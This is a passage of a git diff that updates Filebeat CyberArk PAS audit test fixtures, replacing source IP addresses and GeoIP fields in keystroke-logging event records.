         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "keystroke logging",
@@ -227,7 +214,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 6380,
+        "log.offset": 6374,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -237,24 +224,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -285,23 +269,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "f1654cf8-8ce5-472a-8205-ba731b0fab46",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:33:47Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Keystroke logging",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:47</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:47Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:47</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:47Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 03:33:47",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "keystroke logging",
@@ -321,7 +300,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 9514,
+        "log.offset": 9502,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -331,24 +310,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -379,23 +355,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T10:35:08Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Keystroke logging",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:35:08</Timestamp>\n    <IsoTimestamp>2021-03-15T10:35:08Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:35:08</Timestamp>\n    <IsoTimestamp>2021-03-15T10:35:08Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=7T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 03:35:08",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "keystroke logging",
@@ -415,7 +386,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 12648,
+        "log.offset": 12630,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -425,24 +396,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -477,23 +445,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:11:18Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Keystroke logging",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:11:18</Timestamp>\n    <IsoTimestamp>2021-03-15T14:11:18Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:11:18</Timestamp>\n    <IsoTimestamp>2021-03-15T14:11:18Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=1309B;User=testark;VIDOffset=8T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814025\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 07:11:18",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "keystroke logging",
@@ -513,7 +476,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 15782,
+        "log.offset": 15758,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -523,24 +486,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
@@ -575,23 +535,18 @@
         "cyberarkpas.audit.extra_details.protocol": "SSH",
         "cyberarkpas.audit.extra_details.psmid": "PSMServer",
         "cyberarkpas.audit.extra_details.session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518",
-        "cyberarkpas.audit.extra_details.src_host": "81.32.170.205",
+        "cyberarkpas.audit.extra_details.src_host": "67.43.156.14",
         "cyberarkpas.audit.file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T14:45:51Z",
         "cyberarkpas.audit.issuer": "Administrator",
         "cyberarkpas.audit.message": "Keystroke logging",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:45:51</Timestamp>\n    <IsoTimestamp>2021-03-15T14:45:51Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>34.71.250.247</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 07:45:51</Timestamp>\n    <IsoTimestamp>2021-03-15T14:45:51Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>361</MessageID>\n    <Desc>Keystroke logging</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>Keystroke logging</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.14;SSHOffset=296291B;User=testark;VIDOffset=2081T;</ExtraDetails>\n    <Message>Keystroke logging</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615819476\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n      <CAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Info",
-        "cyberarkpas.audit.station": "34.71.250.247",
+        "cyberarkpas.audit.station": "81.2.69.143",
         "cyberarkpas.audit.timestamp": "Mar 15 07:45:51",
         "destination.address": "34.123.103.115",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "34.123.103.115",
         "destination.user.name": "testark",
         "event.action": "keystroke logging",
@@ -611,7 +566,7 @@
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 19698,
+        "log.offset": 19668,
         "log.syslog.priority": "5",
         "network.application": "ssh",
         "network.direction": "external",
@@ -621,24 +576,21 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "34.123.103.115",
-            "34.71.250.247",
-            "81.32.170.205"
+            "67.43.156.14",
+            "81.2.69.143"
         ],
         "related.user": [
             "Administrator",
             "testark"
         ],
         "service.type": "cyberarkpas",
-        "source.address": "81.32.170.205",
-        "source.geo.city_name": "Barcelona",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "81.32.170.205",
+        "source.address": "67.43.156.14",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.user.name": "Administrator",
         "tags": [
             "cyberarkpas.audit",
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log b/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log
index 211d487b6130..db8fe30fd662 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/38_cpm_verify_password_failed.log
@@ -1,8 +1,8 @@
